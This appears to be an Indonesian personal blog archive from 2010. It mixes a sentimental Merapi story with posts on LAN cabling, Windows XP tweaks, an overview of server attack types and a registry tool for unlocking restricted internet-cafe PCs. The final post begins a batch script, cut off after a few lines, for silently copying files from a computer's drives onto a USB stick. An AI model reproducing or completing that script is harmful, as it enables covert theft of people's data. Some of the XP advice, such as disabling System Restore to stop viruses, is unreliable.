Saturday, November 13, 2010

Sepucuk Surat Dari Janda Korban Letusan Merapi, Mengharukan

Mahasiswa yang tubuhnya penuh debu itu akhirnya menemukan tempat ibunya di barak pengungsi di kaki Merapi. Tapi ibunya sejak pagi tadi sudah dibawa relawan ke rumah sakit lantaran sesak napas akibat menghisap terlalu banyak debu vulkanik.
Dua adik perempuannya ikut serta menemani ibu. Matanya yang cemas melihat secarik kertas menyembul dari tas tua milik ibunya. Dengan tangan gemetar ia ambil dan membuka lipatannya. Tulisan ibu.. ia mengenali tulisan indah ibunya..














Kesedihan yang teramat dalam dirasakan para korban - pengungsi Gunung Merapi

SURAT:

“Anakku.. kita sudah tak punya apa-apa lagi, nak. Semua sapi kita mati. Sawah kita yang hijau telah hangus berubah kelabu, hanya menyisakan timbunan debu. Ibu sudah tak dapat mengirim uang lagi untuk biaya kuliahmu. Seandainya bapakmu masih ada… ya Allah semoga almarhum telah damai di sisi-Mu..

Anakku.. yang ibu punya sekarang hanya doa. Doa yang selalu ada untuk putra-putri ibu. Katanya pemerintah akan mengganti ternak yang mati. Tapi ibu sudah tak berharap Sultan akan memenuhi janji. Ibu sudah berhenti berharap pada manusia. Ibu hanya ingin berharap pada Allah yang tak mungkin mengingkari janji-Nya. Berharap pada manusia sering membuat kita kecewa.

Harta benda kita memang sudah musnah. Tapi kita punya Tuhan. Kita punya janji-Nya yang pasti terpenuhi. Percayalah nak, Tuhan akan menurunkan kebaikan kepada orang-orang yang berusaha menjadi hamba-Nya yang baik. Kamu putra ibu yang kuat, bantulah sesama dengan tenagamu. Kamu putra ibu yang cerdas, bantulah sesama dengan kepintaranmu. Kalau kelak kamu mendapat anugerah rizki-Nya, ringankan hatimu untuk selalu bersedekah. Sayangi dirimu dengan menyayangi sesama…


















Sepasang sandal ini menjadi saksi bisu kedukaan dan nestapa hilangnya harta benda dan desa mereka yang disapu wedus gembel Merapi

Anakku, janganlah pernah melupakan Allah, agar Allah tak melupakanmu. Teruslah untuk mengingat Allah, baik di waktu senang maupun susah. Ucapkanlah nama-nama-Nya yang indah dengan hatimu untuk mengusir semua resah dan gelisah. Zikrullah itu nak, akan menenteramkan hatimu.. akan memekarkan setiap kuntum bunga di taman hatimu.

Anakku.. Merapi ini gunung kita, kampung kita. Merapi ini tumpah darahmu. Kelak kamu mungkin pergi jauh meninggalkan Merapi.. tapi merapi akan tetap menjadi kampung halamanmu. Udara pertama yang kamu hirup udara Merapi. Air pertama yang kamu minum air Merapi. Makanan pertama yang kamu makan tumbuh di Merapi. Tanah pertama yang kamu injak tanah Merapi. Sahabat pertama yang kamu kenal adalah orang Merapi. Kamu akan selalu merindukannya, sebab separo jiwamu ada di sini.. di merapi ini.

Jangan pernah marah pada Merapi, anakku, sebab gunung ini tak bersalah. Gunung Merapi tak pernah marah. Gunung ini bergerak, terus bergerak sembari bertasbih untuk memenuhi takdirnya menjaga keseimbangan bumi. Gunung adalah pasak yang mengutuhkan bumi kita.

Tetaplah menyayangi gunung kita, Merapi kita.. dengan tidak mencederai hutannya, bebatuannya, airnya. Tetaplah tersenyum pada Merapi kita agar Merapi juga tersenyum untuk kita. Merapi akan selalu menyimpan anugerah Tuhan untuk orang-orang yang hidup bersamanya. Teruslah berusaha untuk memahami gunung kita, sebab kitalah yang harus menyesuaikan diri untuk hidup bersamanya. Jangan pernah memaksa gunung untuk menyesuaikan dirinya pada kita..

Anakku.. kamu putra ibu.. dan akan selalu menjadi putra ibu.

Usai membaca kalimat terakhir yang ditulis ibunya, anak muda itu tak dapat lagi menahan gejolak hatinya. Sekujur tubuhnya bergetar, dadanya gemuruh, lalu tangisnya meledak dengan tubuh luruh bersimpuh. Air matanya meleleh bercampur debu.

“Subhanallah.. iya ibu, saya putra ibu.. selamanya tetap menjadi putra ibu. Ibu adalah mata airku.. selamanya menjadi mata air untuk putramu ibu…”

Friday, October 22, 2010

Cara Pasang Kabel UTP LAN (alat dan bahan)

Kabel UTP (LAN) dan serba-serbinya


Kabel UTP atau Unshielded Twisted Pair atau Ethernet Cable atau kita biasa menyebutnya dengan kabel LAN adalah kabel yang digunakan untuk menghubungkan antar peralatan yang berhubungan dengan computer network (komputer, hub, switch, router).
Kabel ini bentuknya seperti kabel telefon, hanya lebih besar. Yang dimaksud dengan kabel UTP adalah hanya kabelnya, sedangkan kepala kabelnya adalah 8 position modular connectors (8P8C) yang biasa disebut RJ-45 (RJ=register jack).

> warna-warna
warna kabel2 didalam kabel UTP adalah:
- biru
- putih-biru
- hijau
- putih-hijau
- oranye
- putih-oranye
- coklat
- putih-coklat

> Jenis kabel
berdasarkan kapasitas
10BASE-T : 10 Mbps (mega bit per second)
Cat 5 (Category 5) / 100BASE-TX : 100 Mbps
Cat 6 (Category 6) / 1000BASE-T : 1000 Mbps (1 Gbps)

> Berdasarkan urutan kabel
ada dua macam susunan kabel:

- TIA/EIA-568-B (Straight-through)
putihorange-orange-putihhijau-biru-putihbiru-hijau-putihcoklat-coklat










- TIA/EIA-568-A
(Crossover)
putihhijau-hijau-putihorange-biru-putihbiru-orange-putihcoklat-coklat




























> Untuk perangkaian kabel straight dan cross sbb:
-Straight (Straight-through): T568A vs T568A atau T568B vs T568B (lebih sering dipakai)
kedua ujung susunannya: putihhijau-hijau-putihorange-biru-putihbiru-orange-putihcoklat-coklat
atau
kedua ujung susunannya: putihorange-orange-putihhijau-biru-putihbiru-hijau-putihcoklat-coklat

-Cross (Crossover): T568A vs T568B
satu ujung susunannya: putihorange-orange-putihhijau-biru-putihbiru-hijau-putihcoklat-coklat
dan
ujung lainnya susunannya: putihhijau-hijau-putihorange-biru-putihbiru-orange-putihcoklat-coklat

> Waktu akan memasangnya, maka potong ujung kabelnya, kemudian susun kabelnya trus diratakan dengan pisau potong yang ada pada crimp tool. Andak tidak perlu repot harus melepaskan isolasi pada bagian ujung kabel, karena waktu Anda memasukan kabel itu ke konektor lalu ditekan (pressed) dengan menggunakan crimp tool, sebenarnya saat itu pin yang ada di konektor menembus sampai ke dalam kabel. Perhatikan, agar penekannya (pressing) yang keras, soalnya kalau tidak keras kadang pin tersebut tidak tembus ke dalam isolasi kabelnya. Kalau sudah kemudian Anda test menggunakan LAN tester. Masukkan ujung ujung kabel ke alatnya, kemudian nyalakan, kalau lampu led yang pada LAN tester menyala semua, dari nomor 1 sampai 8 berarti Anda telah sukses. Kalau ada salah satu yang tidak menyala berarti kemungkinan pada pin nomor tersebut ada masalah. Cara paling mudah yaitu Anda tekan (press) lagi menggunakan tang. Kemungkinan pinnya belum tembus. Kalau sudah Anda tekan tetapi masih tidak nyambung, maka coba periksa korespondensinya antar pin udah 1-1 atau belum. Kalau ternyata sudah benar dan masih gagal, berarti memang Anda belum beruntung. Ulangi lagi sampai berhasil.

> LAN TESTER – alat untuk memeriksa benar tidaknya sambungan kabel. Untuk tipe straight jika benar maka led 1 sampai 8 berkedip.

> Kalo Semua lagkah sudah benar langsung deh di tes di Komputer 

GOOd LuCk.... Semoga Bermanfaat..

Thursday, October 21, 2010

Agar WINDOWS XP Jadi Ringan

Mudah-mudahan ini bisa membantu teman-teman agar windows xp bisa lebih kenceng dan menghasilkan PC yang optimal, Padahal sudah dilakukan berbagai upaya untuk menambah memori dan meningkatkan prosesor.
Namun tetap saja, masih ada beberapa proses yang dianggap lambat. (tapi saya masih perlu saran dari para master dan teman-teman). Yang akan kita sentuh adalah sebagai berikut :

1. System Properties
2. System Configuration
3. Registry


1. System Properties
Adalah ruang berisi informasi tentang nama dan organisasi pemilik. Anda bisa membukanya dengan klik kanan pada icon MyKomputer dan pilih Properties . Atau bisa juga dengan menekan tombol Start + Pause Break .

Ada beberapa rahasia yang akan kita obrak-abrik pada system properties ini, sehingga menghasilkan installasi yang optimal. Ikuti langkah berikut :

1. Klik kanan pada icon MyComputer dan pilih Properties . Atau bisa juga dengan menekan tombol Start + Pause Break .

2. Klik menu System Restore , pastikan anda mengklik Turn Off System Restore On All Drives .Ini akan sangat berguna untuk menghalau salah satu cara perkembangbiakan virus.

3. Kemudian klik Advanced .Terdapat 3 menu setting di bawahnya.

* Klik Setting pertama dan pastikan anda memilih Adjust For Best Performance . Lanjutkan dengan mengklik Apply . Tunggu beberapa saat,dan tampilan windows akan berubah menjadi klasik. Tampilan tersebut dapat kita rubah sesuai keinginan kita nanti.

* Selanjutnya klik Advanced , dan klik Change untuk merubah Virtual Memory.
(Virtual memory adalah Space yang dijadikan memory bayangan untuk membantu kinerja memory asli yang biasa kita sebut RAM . Virtual memory ini akan meminta ruangan dari harddisk.

* Pada sub menu Custome Size , terdapat kolom Initial Size . Isikan kolom dengan angka minimal 2 kali jumlah RAM yang anda pasang.

Misalnya anda memasang RAM 128 MB, maka isi kolom tersebut dengan jumlah minimal 256. Dan pada kolom berikutnya isi dengan 2 x kolom pertama. Jangan lupa klik Set . Klik OK dan OK lagi sehingga kembali ke System Properties awal.

* Sekarang, klik menu Setting yang ketiga, anda akan melihat dua kolom yang berisi angka 30. Rubah angka tersebut menjadi 3 . Kemudian buang tanda Ceklis (v) pada Automatically Restart .
* Klik OK setelah selesai.
* Tutup System Properties dengan mengklik OK

Dari hasil otak-atik tadi, tampilan windows terasa amat membosankan. Semuanya serba Classic, seolah-olah bukan Windows XP.Jangan khawatir, itu hanya sekedar tampilan yang bisa kita rubah setiap saat. Caranya :

1. Klik kanan di ruang kosong pada area Desktop dan pilih Properties sehingga muncul kotak dialog Display Properties
2. Klik menu Themes , kemudian pada kolom Themes dibawahnya, klik tanda panah ( Pop up ) dan pilih Windows XP .

Jika sebelumnya sudah terpilih Windows XP , maka pilih dulu Themes lain, kemudian klik panah lagi dan pilih Windows XP . Ini dilakukan untuk memancing tampilan Windows XP yang sesungguhnya.
3. Klik Apply dan lihat hasilnya.
4. Selanjutnya klik menu Desktop , perhatikan di bagian bawah. Disana terdapat sub menu Customize Desktop , klik menu tersebut.
5. Pada tampilan kotak dialog berikutnya, pastikan anda membuang tanda Ceklis (v) pada Run Desktop Cleanup Every 60 Days.
Ini dilakukan untuk menghindari penghapusan otomatis Windows terhadap icon-icon yang sudah dianggap tidak penting, padahal menurut kita masih sangat penting.
6. Klik OK dan OK lagi untuk menutup Display Properties


2. System Configuration
Ruang berikutnya yang akan kita bedah adalah System Configuration . Perhatikan langkah berikut :

1. Klik Start pilih Run dan ketik msconfig kemudian Ok atau langsung tekan Enter

2. Dideretan menu bagian atas, di ujung kanan terdapat menu Startup . Klik menu tersebut.

3. Lihat ke bagian bawah, terdapat sederetan nama dengan masing-masing mempunyai tanda ceklis (v).

Nama-nama tersebut adalah indikasi program yang akan selalu berjalan ketika Windows baru pertama kali tampil. Dan jika kita membiarkan tanda ceklisnya, maka Windows akan sedikit lambat ketika pertama kali proses Loading .

1. buang tanda ceklis pada nama program yang dianggap tidak perlu untuk ditampilkan pada waktu START UP. Kemudian klik Apply

2. Klik OK untuk menutup System Configuration dan klik Restart .

3. Minum kopi, makan cemilan, atau pesen nasi goreng untuk menunggu komputer anda yang Restart.

Setelah komputer Restart dan kembali ke ruangan Desktop , anda dikagetkan dengan munculnya kotak dialog yang tentu saja berbahasa inggris.
Langsung saja klik kotak kecil untuk memberi ceklis pada Don't Show This Massage ….., (dst) kemudian klik OK . Maka kotak tadi tidak akan muncul lagi ketika Windows baru Restart .

3. Registry
Registry adalah ruang Administrator Windows. Keluar masuknya program yang terinstall akan selalu melapor terlebih dahulu ke Registry .

Berikut ini adalah directory yang terdapat di Registry yang akan kita obrak-abrik

1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG

Yang akan kita sentuh adalah bagian a dan b . Ikuti langkah berikut :

1. Klik Start pilih Run dan ketik regedit , klik OK atau langsung tekan Enter
2. Klik tanda plus (+) pada HKEY_CURRENT_USER
3. Klik tanda plus (+) pada Control Panel
4. Klik tanda plus (+) pada Desktop

( Perhatikan jendela sebelah kanan pada posisi Desktop. Terdapat sederetan String yang cukup memusingkan dan tentu saja berbahasa Inggris. J . Cari dan temukan MenuShowDelay . Jika sudah ketemu, klik dua kali dan rubah nilainya dari 400 menjadi 0, kemudian klik OK )

5. Sekarang kembali ke jendela sebelah kiri

6. Dibawah directory Desktop terdapat sub directory WindowsMetrics . Klik sub directory tersebut dan perhatikan jendela sebelah kanan.
7. Cari dan temukan MinAnimate , klik dua kali pada value tersebut dan rubah nilainya menjadi 1 , klik OK .

Sekarang tutup Registry dengan tombol Alt + F4 atau dengan mengklik tanda silang ( X) dibagian atas kanan jendela.

Restart Komputer anda dan lihat hasilnya

~Selamat Mencoba Ya...~ Good Luck

Cara Membuat Shortcut Shutdown,Restart,Logout

Kali ini kita sama-sama akan mencoba membuat shortcut shutdown, restart dan logoff,. Tidak seperti membuat shortcut pada umumnya, diperlukan beberapa trik untuk membuatnya,.
Langsung saja, mari kita coba
Membuat Shortcut, Restart dan Logoff

1. Klik kanan di desktop masing-masing, kemudian New -> Shortcut
2. Akan muncul sebuah form, ketikkan kode sesuai shotcut yang ingin dibuat, berikut kodenya:
3. Shortcut Shutdown : shutdown.exe -s -t 00
4. Shortcut Logout : shutdown.exe -l -t 00
5. Shortcut Restart : shutdown.exe -r -t 00
6. Shortcut cancelshutdown : shutdown.exe -a -t 00
7. Copy code yang bertext tebal, biar ga salah saya sarankan di copas (copy paste) ja yag :D
8. Selanjutnya klik next, kemudian tentukan nama shortcut , klik Finish
9. Sekarang kita udah punya shortcut untuk shutddown, restart ato logout. Cara menggunakannya cukup klik double

Berikut Penjelasan Kode Diatas

* Shutdown.exe(spasi)-s(spasi)-t(spasi)00.
* 00 = Adalah waktu delay sebelum komputer shutdown ato restart, angka ini dapat diganti sesuai keinginan, misalnya 20, berarti kita akan menunggu 20 detik sebelum komputer mejalan kan perintah.
* L : Log out
* R : Restart
* S : Shutdown
* A : Cancel Shutdown
* M\\computername : Shutdown komputer lain dalam jaringan. Tentu saja Anda harus mengetahui password administrator atau hak terhadap komputer yang bersangkutan
* Txx : Waktu tunggu shutdown
* F : Tetap shutdown walaupun masih ada program yang berjalan
* Contoh penggunaan kode -f , misalnya Shutdown.exe -f -t 20 (artinya shutdown tetap dijalankan walaupun masih ada program yang berjalan, dan windows akan memberikan waktu tunggu selama 20 detik sebelum windows benar-benar shutdown)

Note : Untuk shortcut Cancel Shutdown, dapat digunakan jika shutdown memiliki waktu delay

Gimana, udah di coba kan? Semoga ??Cara Membuat Shortcut Shutdown,Restart,Logout ini bermanfaat buat rekan-rekan

Tips :

“Agar tampilan shortcut lebih menarik, klik kanan -> properti -> klik tab shortcut kemudian klik tombol change icon, pilih icon yang kita sukai, kemudian klik OK.”
Nah Segitu Aja Ya ... Semoga Bermanfaat Oke.. Good luck.

Saturday, October 16, 2010

Wow! Ada Komputer yang Bisa Perbaiki Diri Sendiri











"Technical University of Denmark (DTU) berhasil mengembangkan CPU komputer yang dapat memperbaiki dirinya sendiri. CPU ini telah diuji NASA."


Kemampuan manusia untuk regenerasi merupakan inspirasi dari tim riset untuk menciptakan komputer ini.

Komputer ini bisa memperbaiki dirinya sendiri tanpa intervensi manusia, kata profesor DTU dan pemimpin tim itu, Jan Madsen.

Teknologi ini diberi nama electronic DNA atau eDNA. â€Å“Kami menciptakan komputer yang tidak memerlukan pusat CPU. Gantinya, terdapat jaringan sel CPU yang lebih kecil. Sel-sel ini menerima frekuensi eDNA memerintahkan apa yang harus dilakukan komputer. Jika salah satu sel mati, sel lain akan mengambil alih,â€� kata Madsen.

Artinya, komputer ini tidak bisa memperbaiki kerusakan fisik. Namun kerusakan itu akan digantikan dengan sumber daya yang ada untuk mentransfer tugas yang tertunda pada bagian lain.

Madsen mengatakan sistem ini lebih stabil daripada komputer tradisional, karena sistem keseluruhan komputer ini tidak bergantung pada satu CPU.

Sunday, September 5, 2010

Cara dan Jenis Hacker Menyerang Situs

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap
server.
Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6
kelas, yaitu:
Intrusion
Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat
menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk
menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).
Hacking is an Art!? =)
Denial of Services (DoS)
Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran
request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting
request pada server secara serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe….)
Joyrider
Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa
belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya ‘onani’ dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe
menyebabkan kerusakan atau kehilangan data.
Vandal
Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)
Scorekeeper
Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya
berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan
kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.
Spy
Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin
target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa ‘mata-mata’ untuk mencuri data perusahaan rivalnya
1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem.
3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.
Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.
11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.
12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception
TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt. ~Semoga Bermanfaat~

Cycops Windows Configuration 1.0


Saya ingin membagi sedikit software yang mungkin sangat kecil kegunaannya tapi saya berharap bisa bermanfaat bagi kawan-kawan ya.............

Kita pasti sudah tidak asing lagi dengan "Registry Editor", disana kita bisa melakukan berbagai macam pengaturan, baik yang dapat kita lakukan langsung dari Windows atau yang memang harus kita lakukan melalui "Registry Editor" itu sendiri. Sebagai contoh, jika kita ingin merubah informasi kepemilikan windows pada System Properties kita harus melakukannya melalui Registry Editor. Sama juga jika kita ingin melarang penggunaan Control Panel, Task Manager dan lain-lain. Tetapi jika kita ingin melakukan banyak pengaturan akan membutuhkan waktu yang lumayan lama, apalagi bagi yang belum mengerti sedikitpun tentang "Registry Editor". Cycops Windows Configuration dapat membantu anda untuk mempermudah dan mempersingkat waktu anda untuk melakukan beberapa pengaturan yang seharusnya dilakukan pada Registry Editor.

Fitur :
1. OS Owner.











Ketika pertama kali anda meng-install sistem operasi windows, anda diharuskan untuk mengisi data kepemilikan sistem operasi windows anda. Yaitu User Name dan Company. Dan anda dapat melihat informasi ini dengan cara klik kanan pada icon My Computer > Properties. Dan informasi kepemilikan sistem operasi windows anda akan ditampilkan pada dialog seperti gambar dibawah ini.

Lihat informasi pada bagian Registered to
(dalam box merah). Ini adalah informasi data kepemilikan sistem operasi windows. Yaitu nama pengguna dan nama perusahaan. Apakah saya dapat mengganti informasi kepemilikan windows tanpa harus meng-install ulang windows? Ya, anda dapat merubahnya. Anda dapat merubahnya melalui registry. Tetapi akan sangat rumit bagi yang tidak mengerti tentang registry. Jangan khawatir, dengan fitur OS Owner yang ada pada Cycops Windows Configuration anda dapat merubahnya sesuai dengan keinginan anda. Hanya dengan mengisikan data pada box User Name dan Company lalu klik tombol Change, anda dapat merubahnya.




2. Configuration.
Digunakan untuk pengaturan pada sistem operasi windows anda. Bisa juga untuk membuka beberapa program yang dikunci pada komputer warnet, seperti: Task Manager, Registry Tools atau Display Properties. Atau memperbaiki pengaturan registry yang mungkin diakibatkan oleh manipulasi virus.




















A. Explorer Settings :
- Enable / Disable Control Panel
- Enable / Disable Folder Options
- Enable / Disable Search
- Enable / Disable Run
- Enable / Disable Desktop
- Show / Hide User Name in Start Menu
- Enable / Disable Turn Off
- Enable / Disable Log Off
- Enable / Disable Right Click
- Enable / Disable Recent Documents Menu
- Enable / Disable All Programs
- Enable / Disable Help and Support
B. System Settings :
- Enable / Disable Registry Tools
- Enable / Disable Task Manager
- Enable / Disable Display Properties
- Enable / Disable Background Page on Display Properties
- Enable / Disable Screen Saver Page on Display Properties
- Enable / Disable Appearance Page on Display Properties
- Enable / Disable Settings Page on Display Properties
Kompatibel dengan Windows 2000 dan Windows XP. Tetapi akan berfungsi secara optimal pada Windows XP.

Untuk Mendownload INI

Good Luck....

Merampok Data Dengan USB FlashDrive

  1. Buka notepad pertama . .. kalau males ngetik bisa copas tulisan di bawah ini ..
@echo off
REM Name : silentxxx
REM Author : Silentxxx
Set silent=%computername% _ %random%
If not exist ”%silent%” Md “%silent%”
For%%a in (C D E F G H I J) do if exist %%a:\ (
